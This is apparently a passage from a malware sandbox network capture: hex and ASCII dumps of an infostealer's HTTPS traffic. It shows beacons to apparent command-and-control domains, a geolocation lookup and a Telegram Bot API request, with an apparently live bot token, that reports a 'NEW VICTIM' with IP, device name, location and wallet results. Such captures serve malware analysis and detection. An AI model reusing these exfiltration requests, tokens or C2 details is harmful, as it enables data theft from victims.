                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ZMA2HLU9L0U1ZF61VHH
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 29573
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:49 UTC15331OUTData Raw: 2d 2d 5a 4d 41 32 48 4c 55 39 4c 30 55 31 5a 46 36 31 56 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 4d 41 32 48 4c 55 39 4c 30 55 31 5a 46 36 31 56 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 4d 41 32 48 4c 55 39 4c 30 55 31 5a 46 36 31 56 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65
                                                                                                                                                                                                                                                              Data Ascii: --ZMA2HLU9L0U1ZF61VHHContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--ZMA2HLU9L0U1ZF61VHHContent-Disposition: form-data; name="pid"1--ZMA2HLU9L0U1ZF61VHHContent-Disposition: form-data; name="lid"FATE99--te
                                                                                                                                                                                                                                                              2024-12-22 01:21:49 UTC14242OUTData Raw: 40 d5 15 bc a3 14 96 1b 59 e7 f3 0d 82 16 5a 1a 87 f0 c2 a0 61 e1 bb b5 85 a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15
                                                                                                                                                                                                                                                              Data Ascii: @YZanZo73$|)PQKnm7>5OEK?6V,i<0egW\ro`#R\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_|x5mDom;z/
                                                                                                                                                                                                                                                              2024-12-22 01:21:50 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:50 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=h8dgoaa2iuqbci6c7vb1li3aq1; expires=Wed, 16 Apr 2025 19:08:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xFhTdHl4YSTzUS1poQvJ1duMwDerca6VRzF3nyavNbMu6Qopsql42F29LSdu4m63m3SZwN1I08jhGaRZ6MM%2BXg7Jo9b%2FAjnh4WstE7ttIuKHKUPl3613%2FU4pcPxjR1dlvBAmIY0%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4c1e080a42b5-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1632&rtt_var=615&sent=21&recv=32&lost=0&retrans=0&sent_bytes=2848&recv_bytes=30561&delivery_rate=1789215&cwnd=218&unsent_bytes=0&cid=f05c6bd52761366b&ts=948&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:21:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              86192.168.2.450544172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:51 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 81
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:51 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:21:52 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=3poev0gvgbnh4tdpr9k7cibkb8; expires=Wed, 16 Apr 2025 19:08:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UNZK1%2FuSRn366G%2BSU%2F%2B0vNJGanw0SKfLkjvp4tIbkGCBVGSObg2IJNQsp%2FPGXPIScngKOyKEq26L4P4pBXmTPxOZYgsqdnx%2BA%2F1f8OU0kwU%2FgMbNVoi81nrEPhN21m0GogTpIQLO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4c2c0b2372a7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1969&rtt_var=755&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1434889&cwnd=177&unsent_bytes=0&cid=42817de377f27b9f&ts=774&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:52 UTC54INData Raw: 33 30 0d 0a 4b 32 4c 64 34 31 32 6c 32 35 34 6e 76 6c 72 30 59 31 6f 43 59 6a 71 45 64 74 4a 6f 6a 46 6c 63 55 32 5a 41 6e 4d 66 58 52 52 46 77 50 77 3d 3d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 30K2Ld412l254nvlr0Y1oCYjqEdtJojFlcU2ZAnMfXRRFwPw==
                                                                                                                                                                                                                                                              2024-12-22 01:21:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              87192.168.2.45060934.117.59.81443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:22:57 UTC91OUTGET /json HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: IPInfoFetcher
                                                                                                                                                                                                                                                              Host: ipinfo.io
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:22:57 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                              Content-Length: 321
                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                              date: Sun, 22 Dec 2024 01:22:57 GMT
                                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                                                                                                              strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-22 01:22:57 UTC321INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a
                                                                                                                                                                                                                                                              Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              88192.168.2.450611149.154.167.220443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:22:59 UTC513OUTGET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20715575%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: TelegramBot
                                                                                                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-22 01:22:59 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:22:59 GMT
                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                              Content-Length: 777
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                              2024-12-22 01:22:59 UTC777INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 31 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22
                                                                                                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":30127,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              89192.168.2.450614104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:01 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:23:02 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:01 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=omisn0fbkkm2i5shbcdf0b30tp; expires=Wed, 16 Apr 2025 19:09:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=paN0HpiTVSeNZ9%2F2mtJHPT8RiOO2mjrNtA73lLhQdVMiifsv7PhX4ItzqYzzjsfEK7GCfOR%2BSwckmNB5%2F2bQSisC9zoeU9lAjt96Q8yyqEsQCpR5bbXUJEhlfa1v4tN4H6EL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4ddf2bd60f74-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3905&min_rtt=1495&rtt_var=2144&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1953177&cwnd=151&unsent_bytes=0&cid=dcf9d8ae93945f90&ts=783&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-22 01:23:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              90192.168.2.450616104.21.89.115443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:23:03 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:23:03 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PvbArZ--&j=
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:23:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=3jvfp9uk989qgilgq1m3rck3hr; expires=Wed, 16 Apr 2025 19:09:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bbh7reyoi7DNSX4LtpavmbfNe8rnpoyjyiUEoKZ6vtTN%2BOFXQt11uDScpFCOGmLuUO6IExZDz2ZmLGfOAaBb2ahtPc%2FZrHtPbqvMEaZ%2F3vceMx1Wt28raSAGlGB7sTqLG1ZG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4debea25de99-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=942&delivery_rate=197004&cwnd=199&unsent_bytes=0&cid=edd956260a0c0b1e&ts=799&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC249INData Raw: 31 63 62 37 0d 0a 47 73 6d 55 31 4a 7a 4f 64 52 59 41 4b 79 57 4e 34 75 4d 2b 32 67 2b 63 44 50 4e 62 6e 52 48 4f 42 46 73 6b 67 78 73 70 4a 49 4a 68 36 2b 4c 32 70 76 70 5a 4e 48 4e 4f 42 37 65 57 6b 55 75 2f 49 37 35 74 6c 33 6d 6e 64 36 39 6f 4b 45 47 76 4f 56 39 4a 6f 43 43 76 39 62 6a 76 71 31 6b 30 5a 56 4d 48 74 37 6d 59 48 4c 39 68 76 6a 62 52 50 76 64 7a 72 32 67 35 52 65 68 30 57 55 6a 68 63 71 58 7a 76 50 6d 74 45 58 64 73 52 6b 44 6f 68 34 4a 55 74 47 62 78 5a 4a 35 35 73 54 4f 72 66 6e 6b 65 6f 56 5a 4d 55 4f 4e 58 71 4f 65 2f 76 72 4e 5a 62 53 4a 4f 53 36 2f 59 77 56 2b 2f 62 66 42 71 6c 7a 44 31 65 61 5a 67 4f 45 44 70 61 30 42 43 36 6e 4b 72 38 4c 33 7a 70 41 56 36 5a 6b 46 4c 37 6f 32 43 48 50 59 74 2b 58 62 52 59 62 38
                                                                                                                                                                                                                                                              Data Ascii: 1cb7GsmU1JzOdRYAKyWN4uM+2g+cDPNbnRHOBFskgxspJIJh6+L2pvpZNHNOB7eWkUu/I75tl3mnd69oKEGvOV9JoCCv9bjvq1k0ZVMHt7mYHL9hvjbRPvdzr2g5Reh0WUjhcqXzvPmtEXdsRkDoh4JUtGbxZJ55sTOrfnkeoVZMUONXqOe/vrNZbSJOS6/YwV+/bfBqlzD1eaZgOEDpa0BC6nKr8L3zpAV6ZkFL7o2CHPYt+XbRYb8
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1369INData Raw: 67 6e 6d 55 6f 56 2f 52 30 57 30 43 67 5a 2b 58 76 39 76 6d 67 56 79 77 69 51 55 76 68 68 59 4a 54 76 32 7a 2b 66 4a 34 35 2f 48 75 6b 59 6a 4e 4a 37 6e 5a 46 54 4f 64 77 6f 76 47 35 2b 61 51 52 65 32 45 4a 43 61 2b 48 6d 52 7a 67 4c 64 35 2b 6b 6a 72 72 66 72 30 6d 4a 67 6a 34 4f 55 78 4b 6f 43 44 72 38 4c 6a 2f 6f 52 64 6d 61 6b 4a 4d 36 70 4b 4b 56 62 56 67 2f 6d 4f 62 4e 76 78 7a 71 32 77 7a 53 65 74 39 52 6b 76 6d 65 4b 75 32 2b 4c 36 72 44 7a 51 36 43 57 54 71 6b 49 5a 51 72 69 2f 45 4c 6f 35 33 35 6a 4f 72 61 6e 6b 65 6f 58 46 4f 52 65 4e 7a 70 50 57 2b 39 62 34 58 5a 6d 52 45 51 76 32 47 68 46 4b 79 62 75 78 6b 6e 7a 2f 38 65 71 64 76 50 45 48 6c 4f 51 55 47 35 32 44 72 72 76 62 66 6f 52 78 34 61 46 35 48 72 35 2f 50 52 66 68 71 38 69 37 4a 65 66
                                                                                                                                                                                                                                                              Data Ascii: gnmUoV/R0W0CgZ+Xv9vmgVywiQUvhhYJTv2z+fJ45/HukYjNJ7nZFTOdwovG5+aQRe2EJCa+HmRzgLd5+kjrrfr0mJgj4OUxKoCDr8Lj/oRdmakJM6pKKVbVg/mObNvxzq2wzSet9RkvmeKu2+L6rDzQ6CWTqkIZQri/ELo535jOrankeoXFOReNzpPW+9b4XZmREQv2GhFKybuxknz/8eqdvPEHlOQUG52DrrvbfoRx4aF5Hr5/PRfhq8i7Jef
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1369INData Raw: 64 77 62 6d 59 51 73 65 6f 46 4b 6f 34 72 58 30 37 69 4a 33 62 45 64 41 2b 63 43 65 45 71 45 74 2b 57 4c 52 59 62 39 2b 72 57 34 2f 56 4f 35 30 53 45 6a 75 64 36 37 35 76 76 36 73 47 6e 46 6d 51 6b 7a 73 6a 59 56 4f 73 6d 33 32 61 35 41 7a 39 54 50 69 4a 6a 35 65 6f 53 45 4c 64 2f 64 7a 36 63 4f 31 38 4b 49 51 59 69 4a 57 43 66 62 41 68 6c 44 34 4e 62 35 6a 6d 54 7a 36 66 4b 31 73 4e 30 50 72 64 55 4e 49 34 32 71 6b 38 72 62 79 70 42 31 35 62 45 31 50 35 6f 75 4b 57 72 68 73 39 43 37 66 65 66 68 72 37 44 35 35 63 75 5a 31 52 6b 6d 69 54 61 6a 34 75 50 6d 36 56 32 73 73 55 41 66 6f 6a 4d 45 45 2b 47 48 33 62 70 6f 7a 2b 33 4f 72 61 7a 78 46 35 6e 70 47 51 65 70 32 72 50 4b 36 39 36 45 52 64 47 56 4e 51 76 32 46 69 46 43 30 4c 62 41 75 6c 69 47 2f 4b 2b 78
                                                                                                                                                                                                                                                              Data Ascii: dwbmYQseoFKo4rX07iJ3bEdA+cCeEqEt+WLRYb9+rW4/VO50SEjud675vv6sGnFmQkzsjYVOsm32a5Az9TPiJj5eoSELd/dz6cO18KIQYiJWCfbAhlD4Nb5jmTz6fK1sN0PrdUNI42qk8rbypB15bE1P5ouKWrhs9C7fefhr7D55cuZ1RkmiTaj4uPm6V2ssUAfojMEE+GH3bpoz+3OrazxF5npGQep2rPK696ERdGVNQv2FiFC0LbAuliG/K+x
                                                                                                                                                                                                                                                              2024-12-22 01:23:04 UTC1369INData Raw: 53 45 4c 54 2b 6c 71 70 66 69 2f 38 36 6f 66 63 32 78 45 54 4f 6d 4c 68 6c 75 2b 59 50 5a 6a 6c 44 72 2b 64 36 5a 30 4f 6b 33 72 64 45 45 47 72 6a 69 73 37 76 61 6d 37 44 42 34 53 31 6c 63 2f 5a 62 42 51 2f 5a 30 76 6d 6d 64 65 61 63 7a 72 32 6b 77 53 65 6c 78 52 45 6e 6b 64 71 33 77 75 2f 75 6a 48 57 5a 71 52 30 72 6b 6a 34 70 4f 75 47 44 36 59 70 55 78 39 48 6e 73 4b 48 6c 42 2b 54 6b 54 42 74 56 31 70 50 61 31 36 4f 77 49 4f 6e 73 4a 51 4f 50 41 32 52 79 30 59 2f 35 68 6e 54 58 30 65 36 31 71 4e 30 48 6b 63 45 4e 4f 38 6e 6d 76 2f 72 66 77 6f 78 5a 77 5a 30 78 44 36 49 53 48 55 2f 67 6a 76 6d 6d 4a 65 61 63 7a 67 30 45 4d 42 4d 42 44 43 31 6d 75 59 65 76 78 75 72 37 30 56 33 68 68 52 55 2f 67 68 6f 68 51 73 6d 54 31 59 70 6f 39 38 33 71 70 59 44 68 44
